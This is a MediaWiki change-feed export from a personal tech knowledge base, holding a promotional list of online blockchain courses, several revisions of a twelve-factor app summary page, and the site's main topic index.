[https://www.coursera.org/specializations/blockchain click here to see more details from State University of New York]&lt;br /&gt;
&lt;br /&gt;
==IBM Blockchain Certification for Developers (Coursera)==&lt;br /&gt;
&lt;br /&gt;
This highly reputed certification program available on Coursera comes with experienced IBM blockchain developers teaching you concepts and strategies on building blockchain business networks. An ideal choice for software developers who are new to blockchain, this course is taught by Ant Cole and Dave Gorman from IBM. The fact that this training just requires 6 weeks of study with only 2 hours to be dedicated every week makes it an ideal weekend course for those with a full time commitment elsewhere. More than 40,000 professionals globally have already enrolled in this program.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key USPs&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
*Learn about fabric development &amp;amp; architecture&lt;br /&gt;
&lt;br /&gt;
*Get to know how to transform your business&lt;br /&gt;
&lt;br /&gt;
*You will earn a Certificate on successful completion of the course.&lt;br /&gt;
&lt;br /&gt;
*Deep dive into Hyperledger Composer, understand the underlying structures, and use it for a real project&lt;br /&gt;
&lt;br /&gt;
*Learn in a community environment with thousands of other learners so you can discuss, debate and master concepts better&lt;br /&gt;
&lt;br /&gt;
*High course rating and good reviews&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Duration : 6 weeks of study, 2 hours per week&lt;br /&gt;
Rating : 4.4 out of 5&lt;br /&gt;
&lt;br /&gt;
[https://www.coursera.org/learn/ibm-blockchain-essentials-for-developers click here to see more details from IBM]&lt;br /&gt;
&lt;br /&gt;
==Blockchain Technology Certification from UC Berkeley (edX)==&lt;br /&gt;
This special program is created by faculty from UC Berkeley’s premier Computer Science department and will provide you with the ideal foundation required to comprehend Bitcoin and blockchain technology. Available on edX, this course is taught by Rustie Lin and Mengyi (Gloria) Wang, University of California, Berkeley. Among other things, this course will cover distributed systems and alternative consensus mechanisms, fundamental applications of bitcoin technology as well as implementation (including JP Morgan’s Quorum, Ripple, Tendermint, and HyperLedger).&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key USPs&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
*Comes from the prestigious UC Berkeley college&lt;br /&gt;
*Covers all fundamentals of the subject&lt;br /&gt;
*Is good for both beginners as well as those at intermediate level&lt;br /&gt;
*Studying is very easy on the edX platform&lt;br /&gt;
*It is up to date with current market trends&lt;br /&gt;
&lt;br /&gt;
Duration : 6 weeks, 3 to 5 hours per week&lt;br /&gt;
Rating : 4.6 out of 5&lt;br /&gt;
&lt;br /&gt;
[https://www.edx.org/professional-certificate/uc-berkeleyx-blockchain-fundamentals click here to see more details from Berkeley]&lt;br /&gt;
&lt;br /&gt;
==Blockchain Certification for Business – Hyperledger Technologies (edX)==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This certification by The Linux Foundation available on edX will you learn how to start building blockchain applications with Hyperledger frameworks. You will learn how information is generated, stored, and shared, and also understand how to evaluate whether a solution is suitable for your business or not. Taught by experts in the domain including Navroop Sahdev, FinTech and Entrepreneur and Nathalie Salami Attorney.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key USPs&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
*This course is suitable for both nontechnical and technical audiences&lt;br /&gt;
*You will learn to identify suitable blockchain uses for your business requirements&lt;br /&gt;
*You will be guided through implementation&lt;br /&gt;
*An eight week course, with a commitment of 3-4 hours per week making it ideal for weekend study as well &lt;br /&gt;
&lt;br /&gt;
Duration : 8 weeks, 3 to 4 hours per week&lt;br /&gt;
Rating : 4.6 out of 5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[https://www.edx.org/professional-certificate/linuxfoundationx-blockchain-for-business click here to see more detail about Hyperledger Technologies]&lt;br /&gt;
&lt;br /&gt;
==Blockchain Training : Ethereum &amp;amp; Solidity : Developer’s Guide (Udemy)==&lt;br /&gt;
&lt;br /&gt;
Stephen Grider is a champion online instructor having taught more than 200,000 students on udemy alone! With a background of working for top corporations in the bay area, he now focuses his energy on training young (and old) minds to get better at all aspects of web development. He is one of the highest rated trainers and all his courses are extremely valuable and knowledgeable. In this program he will teach you how to use Ethereum, Solidity and Smart Contracts to build applications based on the blockchain. We have no doubt in calling this the best Blockchain course.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key USPs&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
*Comprehensive course spanning 24 hours including 10 articles, all with lifetime access&lt;br /&gt;
&lt;br /&gt;
*Trainer help you work on real projects with Ethereum&lt;br /&gt;
&lt;br /&gt;
*Learn to design, test and implement secure Smart Contracts&lt;br /&gt;
&lt;br /&gt;
*Learn to use the latest version of Ethereum development tools&lt;br /&gt;
&lt;br /&gt;
*Learn in depth the capability and scope of Solidity&lt;br /&gt;
&lt;br /&gt;
*This program is hosted on Udemy and is available at special pricing for our readers.&lt;br /&gt;
&lt;br /&gt;
Duration : 24 hours&lt;br /&gt;
Rating : 4.7 out of 5&lt;br /&gt;
&lt;br /&gt;
[https://www.udemy.com/ethereum-and-solidity-the-complete-developers-guide/ click here to see Udemy course]&lt;br /&gt;
&lt;br /&gt;
==Blockchain and Bitcoin Fundamentals (Udemy)==&lt;br /&gt;
&lt;br /&gt;
This is one of the best course on the subject, created by George Levy and it will help you demystify the key elements of the technology while making you understand how it works. This is one quick program that will take under 3 hours to get over.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key USPs&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
*High rating of 4.7 out of 5&lt;br /&gt;
*Learn all about the fundamentals&lt;br /&gt;
*Role of how Bitcoin miners, How Block Hashes work&lt;br /&gt;
*Learn all about DAOs and DACs&lt;br /&gt;
*A crisp course that has already been taken up by more than 30,000 students worldwide&lt;br /&gt;
*Sending and Receiving Bitcoins&lt;br /&gt;
&lt;br /&gt;
Duration : 2.5 hours&lt;br /&gt;
Rating : 4.7 out of 5&lt;br /&gt;
&lt;br /&gt;
[https://www.udemy.com/blockchain-and-bitcoin-fundamentals click here to see Udemy course]&lt;br /&gt;
&lt;br /&gt;
==Blockchain Developer Tutorial with Ethereum and Solidity (Udemy)==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
First lets talk about the trainers. Sebastien Arbogast, is a fullstack software developer, consultant, speaker and an entrepreneur. Along with Said Eloudrhiri, he has been working towards getting more developers involved in blockchain and developing better tools for its development. Said has been working in IT for 25+ years and a is a proficient developer, software architect, team leader as well as agile coach. With 2 CVs like that you know you are in very safe hands in this course. Together, this duo will help you develop your first decentralized application from scratch on the Ethereum.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Key USPs –&lt;br /&gt;
&lt;br /&gt;
*Learn how to develop a distributed application, how to unit test them and create a user interface for them&lt;br /&gt;
*Learn how to use the Truffle build and testing framework&lt;br /&gt;
*The tutorial goes from the very basics to advanced levels&lt;br /&gt;
*Learn about the fundamental of the solidity smart contract language&lt;br /&gt;
*Get lifetime access to 15 hours of online content + 3 articles and 49 supplemental resources&lt;br /&gt;
&lt;br /&gt;
Duration : 15 hours&lt;br /&gt;
Rating : 4.6 out of 5&lt;br /&gt;
&lt;br /&gt;
[https://www.udemy.com/getting-started-with-ethereum-solidity-development click here to see Udemy course]&lt;br /&gt;
&lt;br /&gt;
==Free Blockchain Course for Beginners (LinkedIn Learning)==&lt;br /&gt;
&lt;br /&gt;
Learn all about the implication of decentralized, encrypted data storage along with understanding the concepts of mining, cryptography, distribution and smart contracts. This free course is available on LinkedIn Learning (previously Lynda.com) and is created by Dr. Jonathan Reichental, an expert in the domain. Ideal for beginners, people with some knowledge of the technology can sign up too.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key USPs&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
*Thousands have already attended this class and have given positive feedback&lt;br /&gt;
*Crisp course to help you learn Blockchain beyond the basics in a short time&lt;br /&gt;
*Includes part about generating and trading cryptocurrency as well&lt;br /&gt;
*Course is practically free since first month on LinkedIn Learning is free&lt;br /&gt;
*The trainer is renowned in this domain and is an international speaker as well&lt;br /&gt;
&lt;br /&gt;
Duration : 1 hour 30 minutes&lt;br /&gt;
Rating : 4.5 out of 5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[https://www.linkedin.com/learning/blockchain-beyond-the-basics click here to see LindkedIn course]&lt;br /&gt;
&lt;br /&gt;
==Blockchain Developer Training : Ethereum Blockchain Developer: Solidity==&lt;br /&gt;
&lt;br /&gt;
Created by Ravinder Deol and Thomas Wiesner, two renowned experts in this domain, this training is all about building projects using Solidity programming. Before you enroll for this course, you should have a basic understanding of either Web Development, JavaScript, Ajax-Requests, AngularJS or other related platforms. Doesn’t mean you need to be an expert in the same. Basic knowledge will be good to go.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key USPs&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
*Types of blockchain and potential uses of the same&lt;br /&gt;
*What are Smart Contracts&lt;br /&gt;
*Using MetaMask plugin&lt;br /&gt;
*Real time action using Solidity&lt;br /&gt;
*Learn all about Decentralisation as you work with the technology&lt;br /&gt;
*Learn how to use Web3 with different projects&lt;br /&gt;
&lt;br /&gt;
Duration : 6.5 hours&lt;br /&gt;
Rating : 4.2 out of 5&lt;br /&gt;
&lt;br /&gt;
[https://www.udemy.com/blockchain-developer click here to see Udemy course]&lt;br /&gt;
&lt;br /&gt;
==Ethereum Developer Masterclass ==&lt;br /&gt;
&lt;br /&gt;
Thomas and Ravinder are back with a development project training. This 10 hour course helps you become adept at the programming languages used to create projects. Most importantly, you will get to create real time projects with the trainers through this program. You should be familiar with Git, HTML, JavaScript and Bootstrap incase you decide to sign up.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key USPs&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
*Develop using Latest Solidity, Web3js, Truffle, TestRPC and MetaMask&lt;br /&gt;
*Basic development knowledge will also do, don’t need to be an expert in the domain&lt;br /&gt;
*Thomas and Ravinder have been involved with Blockchain since 2012 and come with multi disciplinary experience with them&lt;br /&gt;
&lt;br /&gt;
Duration : 10 hours&lt;br /&gt;
Rating : 4.4 out of 5&lt;br /&gt;
&lt;br /&gt;
[https://www.udemy.com/ethereum-masterclass click here to see Udemy course]&lt;br /&gt;
&lt;br /&gt;
==The Basics of Blockchain==&lt;br /&gt;
&lt;br /&gt;
This is only for those wanting to get an overview and introduction. A quick 1.5 hour video training takes you through the fundamentals you need to understand this technology.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key USPs&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
*You will be able to pen down a piece regarding use cases and industry potential&lt;br /&gt;
*Help your business or your clients get ready for the emerging decentralized economy&lt;br /&gt;
*Created by 5 experts on the subject – Tom Serres, Bettina Warburg, John Fitch, Collin Cusce, Tate Ryan-Mosley&lt;br /&gt;
*6,000 + people have already attended the training&lt;br /&gt;
&lt;br /&gt;
Rating : 4.2 out of 5&lt;br /&gt;
&lt;br /&gt;
[https://www.udemy.com/the-basics-of-blockchain click here to see Udemy course]&lt;br /&gt;
&lt;br /&gt;
==Bitcoin and Cryptocurrency Technologies – Princeton University==&lt;br /&gt;
Princeton University brings you this Bitcoin &amp;amp; Cryptocurrency Certification Course taught by Arvind Narayanan, Assistant Professor at the University. Spread across 11 weeks, this is ideal for those who want to take it a little slow and understand all about crypto in detail from an academic point of view.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key USPs&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
*Learn how Bitcoin achieves decentralization&lt;br /&gt;
*Learn How to Store, Use and Mine Bitcoins&lt;br /&gt;
*Get a Certification from Princeton&lt;br /&gt;
*Instructor discusses in detail about the future of Bitcoin , Altcoin and Cryptocurrencies in general&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Rating : 4.7 out of 5&lt;br /&gt;
&lt;br /&gt;
[https://www.coursera.org/learn/cryptocurrency click here to see Princeton University course]&lt;br /&gt;
&lt;br /&gt;
==Blockchain Developer Training - Getting Started with Ethereum Solidity Development==&lt;br /&gt;
&lt;br /&gt;
Sebastien Arbogast is a full stack software developer, consultant and trainer with over 12 years of experience. He teams up with Said Eloudrhiri who’s been working in IT for the last 25 years! With a CV like that, you know you are in the safest of hands. They both have decided to share their knowledge on this subject to help you learn and grow in the field of blockchain and ethereum development using Solidity.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Key USPs&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
– Learn to develop a distributed application&lt;br /&gt;
– Understand how to write smart contracts and creating a user interface for them&lt;br /&gt;
– Learn how to use Metamask&lt;br /&gt;
– You will also learn Truffle building and testing framework&lt;br /&gt;
– Deploying a decentralized app to various Ethereum instances (testrpc, private chain, test chain, main net)&lt;br /&gt;
– Participant Mohit Shah feels “The course was complete and really good with all the explanations. I had know experience or idea about solidity but this course helped me to really get started with Ethereum DAPP development.”&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
Rating : 4.6 out of 5&lt;br /&gt;
&lt;br /&gt;
[https://www.udemy.com/getting-started-with-ethereum-solidity-development click here to see Udemy course]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Resources=&lt;br /&gt;
&lt;br /&gt;
https://blockgeeks.com/guides/what-is-blockchain-technology/&lt;br /&gt;
&lt;br /&gt;
https://www.computerworld.com/article/3258848/blockchain/the-blockchain-market-is-hot-heres-how-to-learn-the-skills-for-it.html&lt;br /&gt;
&lt;br /&gt;
https://medium.com/hyperlegendary/6-blockchain-frameworks-to-build-enterprise-blockchain-how-to-choose-them-2b7d50ba275c&lt;br /&gt;
&lt;br /&gt;
https://radiostud.io/eight-blockchain-platforms-comparison/&lt;br /&gt;
&lt;br /&gt;
https://www.horsesforsources.com/top-5-blockchain-platforms_031618&lt;br /&gt;
&lt;br /&gt;
https://dzone.com/articles/best-3-enterprise-blockchain-platforms-for-rapid-p&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=The_twelve_factors&amp;diff=1083</id>
		<title>The twelve factors</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=The_twelve_factors&amp;diff=1083"/>
		<updated>2021-04-22T11:23:25Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Overview=&lt;br /&gt;
&lt;br /&gt;
In the modern era, software is commonly delivered as a service: called web apps, or software-as-a-service. The twelve-factor app is a methodology for building software-as-a-service apps that:&lt;br /&gt;
&lt;br /&gt;
* Use declarative formats for setup automation, to minimize time and cost for new developers joining the project;&lt;br /&gt;
* Have a clean contract with the underlying operating system, offering maximum portability between execution environments;&lt;br /&gt;
* Are suitable for deployment on modern cloud platforms, obviating the need for servers and systems administration;&lt;br /&gt;
* Minimize divergence between development and production, enabling continuous deployment for maximum agility;&lt;br /&gt;
* And can scale up without significant changes to tooling, architecture, or development practices.&lt;br /&gt;
&lt;br /&gt;
The twelve-factor methodology can be applied to apps written in any programming language, and which use any combination of backing services (database, queue, memory cache, etc).&lt;br /&gt;
&lt;br /&gt;
=The Twelve Factors=&lt;br /&gt;
== Codebase ==&lt;br /&gt;
One codebase tracked in revision control, many deploys&lt;br /&gt;
== Dependencies==&lt;br /&gt;
Explicitly declare and isolate dependencies&lt;br /&gt;
==Config==&lt;br /&gt;
Store config in the environment&lt;br /&gt;
==Backing services==&lt;br /&gt;
Treat backing services as attached resources&lt;br /&gt;
==Build, release, run==&lt;br /&gt;
Strictly separate build and run stages&lt;br /&gt;
==Processes==&lt;br /&gt;
Execute the app as one or more stateless processes&lt;br /&gt;
==Port binding==&lt;br /&gt;
Export services via port binding&lt;br /&gt;
==Concurrency==&lt;br /&gt;
Scale out via the process model&lt;br /&gt;
==Disposability==&lt;br /&gt;
Maximize robustness with fast startup and graceful shutdown&lt;br /&gt;
==Dev/prod parity==&lt;br /&gt;
Keep development, staging, and production as similar as possible&lt;br /&gt;
==Logs==&lt;br /&gt;
Treat logs as event streams&lt;br /&gt;
==Admin processes==&lt;br /&gt;
Run admin/management tasks as one-off processes&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Source&amp;#039;&amp;#039;&amp;#039;: https://12factor.net/&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=The_twelve_factors&amp;diff=1082</id>
		<title>The twelve factors</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=The_twelve_factors&amp;diff=1082"/>
		<updated>2021-04-22T11:23:10Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Overview=&lt;br /&gt;
&lt;br /&gt;
In the modern era, software is commonly delivered as a service: called web apps, or software-as-a-service. The twelve-factor app is a methodology for building software-as-a-service apps that:&lt;br /&gt;
&lt;br /&gt;
* Use declarative formats for setup automation, to minimize time and cost for new developers joining the project;&lt;br /&gt;
* Have a clean contract with the underlying operating system, offering maximum portability between execution environments;&lt;br /&gt;
* Are suitable for deployment on modern cloud platforms, obviating the need for servers and systems administration;&lt;br /&gt;
* Minimize divergence between development and production, enabling continuous deployment for maximum agility;&lt;br /&gt;
* And can scale up without significant changes to tooling, architecture, or development practices.&lt;br /&gt;
&lt;br /&gt;
The twelve-factor methodology can be applied to apps written in any programming language, and which use any combination of backing services (database, queue, memory cache, etc).&lt;br /&gt;
&lt;br /&gt;
=The Twelve Factors=&lt;br /&gt;
== Codebase ==&lt;br /&gt;
One codebase tracked in revision control, many deploys&lt;br /&gt;
== Dependencies==&lt;br /&gt;
Explicitly declare and isolate dependencies&lt;br /&gt;
==Config==&lt;br /&gt;
Store config in the environment&lt;br /&gt;
==Backing services==&lt;br /&gt;
Treat backing services as attached resources&lt;br /&gt;
==Build, release, run==&lt;br /&gt;
Strictly separate build and run stages&lt;br /&gt;
==Processes==&lt;br /&gt;
Execute the app as one or more stateless processes&lt;br /&gt;
==Port binding==&lt;br /&gt;
Export services via port binding&lt;br /&gt;
==Concurrency==&lt;br /&gt;
Scale out via the process model&lt;br /&gt;
==Disposability==&lt;br /&gt;
Maximize robustness with fast startup and graceful shutdown&lt;br /&gt;
==Dev/prod parity==&lt;br /&gt;
Keep development, staging, and production as similar as possible&lt;br /&gt;
==Logs==&lt;br /&gt;
Treat logs as event streams&lt;br /&gt;
==Admin processes==&lt;br /&gt;
Run admin/management tasks as one-off processes&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Soure&amp;#039;&amp;#039;&amp;#039;: https://12factor.net/&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=The_twelve_factors&amp;diff=1081</id>
		<title>The twelve factors</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=The_twelve_factors&amp;diff=1081"/>
		<updated>2021-04-22T10:57:32Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Overview=&lt;br /&gt;
&lt;br /&gt;
In the modern era, software is commonly delivered as a service: called web apps, or software-as-a-service. The twelve-factor app is a methodology for building software-as-a-service apps that:&lt;br /&gt;
&lt;br /&gt;
* Use declarative formats for setup automation, to minimize time and cost for new developers joining the project;&lt;br /&gt;
* Have a clean contract with the underlying operating system, offering maximum portability between execution environments;&lt;br /&gt;
* Are suitable for deployment on modern cloud platforms, obviating the need for servers and systems administration;&lt;br /&gt;
* Minimize divergence between development and production, enabling continuous deployment for maximum agility;&lt;br /&gt;
* And can scale up without significant changes to tooling, architecture, or development practices.&lt;br /&gt;
&lt;br /&gt;
The twelve-factor methodology can be applied to apps written in any programming language, and which use any combination of backing services (database, queue, memory cache, etc).&lt;br /&gt;
&lt;br /&gt;
=The Twelve Factors=&lt;br /&gt;
== Codebase ==&lt;br /&gt;
One codebase tracked in revision control, many deploys&lt;br /&gt;
== Dependencies==&lt;br /&gt;
Explicitly declare and isolate dependencies&lt;br /&gt;
==Config==&lt;br /&gt;
Store config in the environment&lt;br /&gt;
==Backing services==&lt;br /&gt;
Treat backing services as attached resources&lt;br /&gt;
==Build, release, run==&lt;br /&gt;
Strictly separate build and run stages&lt;br /&gt;
==Processes==&lt;br /&gt;
Execute the app as one or more stateless processes&lt;br /&gt;
==Port binding==&lt;br /&gt;
Export services via port binding&lt;br /&gt;
==Concurrency==&lt;br /&gt;
Scale out via the process model&lt;br /&gt;
==Disposability==&lt;br /&gt;
Maximize robustness with fast startup and graceful shutdown&lt;br /&gt;
==Dev/prod parity==&lt;br /&gt;
Keep development, staging, and production as similar as possible&lt;br /&gt;
==Logs==&lt;br /&gt;
Treat logs as event streams&lt;br /&gt;
==Admin processes==&lt;br /&gt;
Run admin/management tasks as one-off processes&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=The_twelve_factors&amp;diff=1080</id>
		<title>The twelve factors</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=The_twelve_factors&amp;diff=1080"/>
		<updated>2021-04-22T10:51:26Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: Created page with &amp;quot;test&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;test&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Main_Page&amp;diff=1079</id>
		<title>Main Page</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Main_Page&amp;diff=1079"/>
		<updated>2021-04-22T10:51:13Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* Google Cloud */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;OasisSoftTech - Knowledge Base&lt;br /&gt;
&lt;br /&gt;
=[[Cloud Security]]=&lt;br /&gt;
&lt;br /&gt;
=[[Security Architecture]]=&lt;br /&gt;
==[[SSL-Secure Sockets Layer]]==&lt;br /&gt;
==[[TLS-Transport Layer Security]]==&lt;br /&gt;
==[[Cryptography Basic Principles]]==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= [[Event Stream]] = &lt;br /&gt;
== [[SSE-Server Sent Events]]==&lt;br /&gt;
== [[WebSocket]] ==&lt;br /&gt;
==[[Long/short polling (client pull)]]==&lt;br /&gt;
==[[WebSockets (server push)]]==&lt;br /&gt;
==[[Server-Sent events (server push)]]==&lt;br /&gt;
&lt;br /&gt;
=[[AI|Artificial Intelligence]]=&lt;br /&gt;
==[[TENSORFLOW]]==&lt;br /&gt;
==[[Machine Learning]]==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=[[Network and Security]]=&lt;br /&gt;
==[[Nmap]]==&lt;br /&gt;
&lt;br /&gt;
=[[Cloud Technologies]]=&lt;br /&gt;
== [[AWS]] == &lt;br /&gt;
===[[HashiCorp]]===&lt;br /&gt;
====[[Vagrant]]====&lt;br /&gt;
==== [[Terraform]] ====&lt;br /&gt;
=== [[API Gateway]] ===&lt;br /&gt;
==== [[API KEY]] ====&lt;br /&gt;
==== [[Resource Policy]] ====&lt;br /&gt;
=== [[AWS WAF]] ===&lt;br /&gt;
Working with SQL Injection Match Conditions&lt;br /&gt;
==[[Azure]]==&lt;br /&gt;
==[[Google Cloud]]==&lt;br /&gt;
===[[The twelve factors]]===&lt;br /&gt;
&lt;br /&gt;
= [[Programming Languages]] - Java, OOP, Spring  etc..=&lt;br /&gt;
== [[Object Oriented Programming (OOP)]]==&lt;br /&gt;
===[[Encapsulation]]===&lt;br /&gt;
===[[Polymorphism]]===&lt;br /&gt;
===[[Inheritance]]===&lt;br /&gt;
===[[Abstraction]]===&lt;br /&gt;
===[[Differences between Abstraction and Encapsulation]]===&lt;br /&gt;
===[[SOLID principles]]===&lt;br /&gt;
==[[Design Patterns]]==&lt;br /&gt;
&lt;br /&gt;
== [[JAVA]] - &amp;gt; [https://www.youtube.com/watch?v=MadFRdg6UQA How to attach(add) javadoc or source code in Eclipse]==&lt;br /&gt;
===[[Java 7]]===&lt;br /&gt;
===[[Java 8]]===&lt;br /&gt;
====[[StreamAPI - Parallelism]]====&lt;br /&gt;
====[[Java SE 8 Interview Questions and Answers - 1]]====&lt;br /&gt;
&lt;br /&gt;
===[[Java 9]]===&lt;br /&gt;
===[[Java 10]]===&lt;br /&gt;
=== [[Collections]]===&lt;br /&gt;
==== [[Set]]====&lt;br /&gt;
===== [[EnumSet]]=====&lt;br /&gt;
===== [[HashSet]]=====&lt;br /&gt;
===== [[LinkedHashSet]]=====&lt;br /&gt;
===== [[TreeSet]]=====&lt;br /&gt;
===== [[SortedSet]]=====&lt;br /&gt;
==== [[List]]====&lt;br /&gt;
===== [[ArrayList]]=====&lt;br /&gt;
===== [[LinkedList]]=====&lt;br /&gt;
===== [[Vector]]=====&lt;br /&gt;
===== [[Stack]]=====&lt;br /&gt;
==== [[Queue]]====&lt;br /&gt;
===== [[PriorityQueue]]=====&lt;br /&gt;
===== [[Deque]]=====&lt;br /&gt;
===== [[ArrayDeque]]=====&lt;br /&gt;
==== [[Map]]====&lt;br /&gt;
===== [[HashMap]]=====&lt;br /&gt;
====== [[LinkedHashMap]]======&lt;br /&gt;
===== [[IdentityHashMap]]=====&lt;br /&gt;
===== [[WeakHashMap]]=====&lt;br /&gt;
===== [[SortedMap]]=====&lt;br /&gt;
====== [[TreeMap]]======&lt;br /&gt;
&lt;br /&gt;
====[[Generics]]====&lt;br /&gt;
====[[Collection Interview Questions and Answers]]====&lt;br /&gt;
&lt;br /&gt;
===[[Java Threads|Multithreading]]===&lt;br /&gt;
====[[Concurrency Basics]]====&lt;br /&gt;
====[[Thread class - Runnable Interface]]====&lt;br /&gt;
====[[ExecutorService and Thread Pools]]====&lt;br /&gt;
====[[Callable and Future]]====&lt;br /&gt;
====[[Concurrency issues and Thread Synchronization]]====&lt;br /&gt;
====[[Locks and Atomic Variables]]====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===[[Java IDE&amp;#039;s]]===&lt;br /&gt;
====[[Eclipse]]====&lt;br /&gt;
====[[NetBeans]]====&lt;br /&gt;
====[[IntelliJ IDEA]]====&lt;br /&gt;
====[[JBuilder]]====&lt;br /&gt;
====[[JDeveloper]]====&lt;br /&gt;
====[[MyEclipse]]====&lt;br /&gt;
&lt;br /&gt;
===[[Java Frameworks]]===&lt;br /&gt;
====[[Springframework]]====&lt;br /&gt;
====[[Spring MVC]]====&lt;br /&gt;
====[[Springframework - Spring Security]]====&lt;br /&gt;
====[[SpringBoot]]====&lt;br /&gt;
=====[[Spring Boot Interview Questions and Answers]]=====&lt;br /&gt;
====[[Hibernate]]====&lt;br /&gt;
&lt;br /&gt;
===[[Java Toolkit]]===&lt;br /&gt;
====[[Java Build Automation Tools|Java Dependency Management and Build Automation Tools]]====&lt;br /&gt;
=====[[Apache Ant with Ivy]]=====&lt;br /&gt;
=====[[Maven|Apache Maven]]=====&lt;br /&gt;
=====[[Gradle]]=====&lt;br /&gt;
&lt;br /&gt;
====[[Java Interview Questions and Answers]]====&lt;br /&gt;
=====[[Core Java - Programming - Coding Interview Questions and Answers]]=====&lt;br /&gt;
=====[[Core Java - Collections - Interview Questions and Answers]]=====&lt;br /&gt;
=====[[General Questions about Java]]=====&lt;br /&gt;
=====[[Java Threads]]=====&lt;br /&gt;
=====[[Java Collections]]=====&lt;br /&gt;
=====[[Garbage Collectors]]=====&lt;br /&gt;
=====[[Exception Handling]]=====&lt;br /&gt;
=====[[JDBC]]=====&lt;br /&gt;
=====[[Remote Method Invocation (RMI)]]=====&lt;br /&gt;
=====[[Servlets]]=====&lt;br /&gt;
=====[[JSP]]=====&lt;br /&gt;
&lt;br /&gt;
== [[JavaScript]]==&lt;br /&gt;
===[[Angular Js]]===&lt;br /&gt;
====[[Angular Js 4]]====&lt;br /&gt;
====[[Angular Js 5]]====&lt;br /&gt;
===[[React]]===&lt;br /&gt;
===[[NodeJS Ecosystem]]===&lt;br /&gt;
===[[NPM]]===&lt;br /&gt;
===[[BootStrap]]===&lt;br /&gt;
===[[JQuery]]===&lt;br /&gt;
===[[TypeScript]]===&lt;br /&gt;
&lt;br /&gt;
==[[Kotlin]]==&lt;br /&gt;
&lt;br /&gt;
==[[PHP]]==&lt;br /&gt;
===[[Phalcon]]===&lt;br /&gt;
===[[XAMPP]]===&lt;br /&gt;
&lt;br /&gt;
= [[Continous Integration &amp;amp; Continous Delivery]]=&lt;br /&gt;
== [[Continous Integration]]==&lt;br /&gt;
== [[Continious Delivery]]==&lt;br /&gt;
